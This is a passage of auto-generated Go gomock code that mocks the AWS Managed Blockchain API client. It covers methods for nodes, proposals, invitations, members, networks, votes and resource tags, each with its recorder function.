func (m *MockManagedBlockchainAPI) GetNodeWithContext(arg0 context.Context, arg1 *managedblockchain.GetNodeInput, arg2 ...request.Option) (*managedblockchain.GetNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNodeWithContext indicates an expected call of GetNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNodeWithContext), varargs...)
}
// GetProposal mocks base method.
func (m *MockManagedBlockchainAPI) GetProposal(arg0 *managedblockchain.GetProposalInput) (*managedblockchain.GetProposalOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetProposal", arg0)
ret0, _ := ret[0].(*managedblockchain.GetProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetProposal indicates an expected call of GetProposal.
func (mr *MockManagedBlockchainAPIMockRecorder) GetProposal(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetProposal", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetProposal), arg0)
}
// GetProposalRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetProposalRequest(arg0 *managedblockchain.GetProposalInput) (*request.Request, *managedblockchain.GetProposalOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetProposalRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetProposalOutput)
return ret0, ret1
}
// GetProposalRequest indicates an expected call of GetProposalRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetProposalRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetProposalRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetProposalRequest), arg0)
}
// GetProposalWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetProposalWithContext(arg0 context.Context, arg1 *managedblockchain.GetProposalInput, arg2 ...request.Option) (*managedblockchain.GetProposalOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetProposalWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetProposalWithContext indicates an expected call of GetProposalWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetProposalWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetProposalWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetProposalWithContext), varargs...)
}
// ListInvitations mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitations(arg0 *managedblockchain.ListInvitationsInput) (*managedblockchain.ListInvitationsOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListInvitations", arg0)
ret0, _ := ret[0].(*managedblockchain.ListInvitationsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListInvitations indicates an expected call of ListInvitations.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitations(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitations", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitations), arg0)
}
// ListInvitationsPages mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsPages(arg0 *managedblockchain.ListInvitationsInput, arg1 func(*managedblockchain.ListInvitationsOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListInvitationsPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListInvitationsPages indicates an expected call of ListInvitationsPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsPages), arg0, arg1)
}
// ListInvitationsPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListInvitationsInput, arg2 func(*managedblockchain.ListInvitationsOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListInvitationsPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListInvitationsPagesWithContext indicates an expected call of ListInvitationsPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsPagesWithContext), varargs...)
}
// ListInvitationsRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsRequest(arg0 *managedblockchain.ListInvitationsInput) (*request.Request, *managedblockchain.ListInvitationsOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListInvitationsRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListInvitationsOutput)
return ret0, ret1
}
// ListInvitationsRequest indicates an expected call of ListInvitationsRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsRequest), arg0)
}
// ListInvitationsWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsWithContext(arg0 context.Context, arg1 *managedblockchain.ListInvitationsInput, arg2 ...request.Option) (*managedblockchain.ListInvitationsOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListInvitationsWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListInvitationsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListInvitationsWithContext indicates an expected call of ListInvitationsWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsWithContext), varargs...)
}
// ListMembers mocks base method.
func (m *MockManagedBlockchainAPI) ListMembers(arg0 *managedblockchain.ListMembersInput) (*managedblockchain.ListMembersOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListMembers", arg0)
ret0, _ := ret[0].(*managedblockchain.ListMembersOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListMembers indicates an expected call of ListMembers.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembers(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembers", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembers), arg0)
}
// ListMembersPages mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersPages(arg0 *managedblockchain.ListMembersInput, arg1 func(*managedblockchain.ListMembersOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListMembersPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListMembersPages indicates an expected call of ListMembersPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersPages), arg0, arg1)
}
// ListMembersPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListMembersInput, arg2 func(*managedblockchain.ListMembersOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListMembersPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListMembersPagesWithContext indicates an expected call of ListMembersPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersPagesWithContext), varargs...)
}
// ListMembersRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersRequest(arg0 *managedblockchain.ListMembersInput) (*request.Request, *managedblockchain.ListMembersOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListMembersRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListMembersOutput)
return ret0, ret1
}
// ListMembersRequest indicates an expected call of ListMembersRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersRequest), arg0)
}
// ListMembersWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersWithContext(arg0 context.Context, arg1 *managedblockchain.ListMembersInput, arg2 ...request.Option) (*managedblockchain.ListMembersOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListMembersWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListMembersOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListMembersWithContext indicates an expected call of ListMembersWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersWithContext), varargs...)
}
// ListNetworks mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworks(arg0 *managedblockchain.ListNetworksInput) (*managedblockchain.ListNetworksOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNetworks", arg0)
ret0, _ := ret[0].(*managedblockchain.ListNetworksOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNetworks indicates an expected call of ListNetworks.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworks(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworks", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworks), arg0)
}
// ListNetworksPages mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksPages(arg0 *managedblockchain.ListNetworksInput, arg1 func(*managedblockchain.ListNetworksOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNetworksPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListNetworksPages indicates an expected call of ListNetworksPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksPages), arg0, arg1)
}
// ListNetworksPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListNetworksInput, arg2 func(*managedblockchain.ListNetworksOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNetworksPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListNetworksPagesWithContext indicates an expected call of ListNetworksPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksPagesWithContext), varargs...)
}
// ListNetworksRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksRequest(arg0 *managedblockchain.ListNetworksInput) (*request.Request, *managedblockchain.ListNetworksOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNetworksRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListNetworksOutput)
return ret0, ret1
}
// ListNetworksRequest indicates an expected call of ListNetworksRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksRequest), arg0)
}
// ListNetworksWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksWithContext(arg0 context.Context, arg1 *managedblockchain.ListNetworksInput, arg2 ...request.Option) (*managedblockchain.ListNetworksOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNetworksWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListNetworksOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNetworksWithContext indicates an expected call of ListNetworksWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksWithContext), varargs...)
}
// ListNodes mocks base method.
func (m *MockManagedBlockchainAPI) ListNodes(arg0 *managedblockchain.ListNodesInput) (*managedblockchain.ListNodesOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNodes", arg0)
ret0, _ := ret[0].(*managedblockchain.ListNodesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNodes indicates an expected call of ListNodes.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodes(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodes", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodes), arg0)
}
// ListNodesPages mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesPages(arg0 *managedblockchain.ListNodesInput, arg1 func(*managedblockchain.ListNodesOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNodesPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListNodesPages indicates an expected call of ListNodesPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesPages), arg0, arg1)
}
// ListNodesPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListNodesInput, arg2 func(*managedblockchain.ListNodesOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNodesPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListNodesPagesWithContext indicates an expected call of ListNodesPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesPagesWithContext), varargs...)
}
// ListNodesRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesRequest(arg0 *managedblockchain.ListNodesInput) (*request.Request, *managedblockchain.ListNodesOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNodesRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListNodesOutput)
return ret0, ret1
}
// ListNodesRequest indicates an expected call of ListNodesRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesRequest), arg0)
}
// ListNodesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesWithContext(arg0 context.Context, arg1 *managedblockchain.ListNodesInput, arg2 ...request.Option) (*managedblockchain.ListNodesOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNodesWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListNodesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNodesWithContext indicates an expected call of ListNodesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesWithContext), varargs...)
}
// ListProposalVotes mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotes(arg0 *managedblockchain.ListProposalVotesInput) (*managedblockchain.ListProposalVotesOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalVotes", arg0)
ret0, _ := ret[0].(*managedblockchain.ListProposalVotesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposalVotes indicates an expected call of ListProposalVotes.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotes(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotes", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotes), arg0)
}
// ListProposalVotesPages mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesPages(arg0 *managedblockchain.ListProposalVotesInput, arg1 func(*managedblockchain.ListProposalVotesOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalVotesPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalVotesPages indicates an expected call of ListProposalVotesPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesPages), arg0, arg1)
}
// ListProposalVotesPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalVotesInput, arg2 func(*managedblockchain.ListProposalVotesOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalVotesPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalVotesPagesWithContext indicates an expected call of ListProposalVotesPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesPagesWithContext), varargs...)
}
// ListProposalVotesRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesRequest(arg0 *managedblockchain.ListProposalVotesInput) (*request.Request, *managedblockchain.ListProposalVotesOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalVotesRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListProposalVotesOutput)
return ret0, ret1
}
// ListProposalVotesRequest indicates an expected call of ListProposalVotesRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesRequest), arg0)
}
// ListProposalVotesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalVotesInput, arg2 ...request.Option) (*managedblockchain.ListProposalVotesOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalVotesWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListProposalVotesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposalVotesWithContext indicates an expected call of ListProposalVotesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesWithContext), varargs...)
}
// ListProposals mocks base method.
func (m *MockManagedBlockchainAPI) ListProposals(arg0 *managedblockchain.ListProposalsInput) (*managedblockchain.ListProposalsOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposals", arg0)
ret0, _ := ret[0].(*managedblockchain.ListProposalsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposals indicates an expected call of ListProposals.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposals(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposals", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposals), arg0)
}
// ListProposalsPages mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsPages(arg0 *managedblockchain.ListProposalsInput, arg1 func(*managedblockchain.ListProposalsOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalsPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalsPages indicates an expected call of ListProposalsPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsPages), arg0, arg1)
}
// ListProposalsPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalsInput, arg2 func(*managedblockchain.ListProposalsOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalsPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalsPagesWithContext indicates an expected call of ListProposalsPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsPagesWithContext), varargs...)
}
// ListProposalsRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsRequest(arg0 *managedblockchain.ListProposalsInput) (*request.Request, *managedblockchain.ListProposalsOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalsRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListProposalsOutput)
return ret0, ret1
}
// ListProposalsRequest indicates an expected call of ListProposalsRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsRequest), arg0)
}
// ListProposalsWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalsInput, arg2 ...request.Option) (*managedblockchain.ListProposalsOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalsWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListProposalsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposalsWithContext indicates an expected call of ListProposalsWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsWithContext), varargs...)
}
// ListTagsForResource mocks base method.
func (m *MockManagedBlockchainAPI) ListTagsForResource(arg0 *managedblockchain.ListTagsForResourceInput) (*managedblockchain.ListTagsForResourceOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListTagsForResource", arg0)
ret0, _ := ret[0].(*managedblockchain.ListTagsForResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListTagsForResource indicates an expected call of ListTagsForResource.
func (mr *MockManagedBlockchainAPIMockRecorder) ListTagsForResource(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListTagsForResource", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListTagsForResource), arg0)
}
// ListTagsForResourceRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListTagsForResourceRequest(arg0 *managedblockchain.ListTagsForResourceInput) (*request.Request, *managedblockchain.ListTagsForResourceOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListTagsForResourceRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListTagsForResourceOutput)
return ret0, ret1
}
// ListTagsForResourceRequest indicates an expected call of ListTagsForResourceRequest.
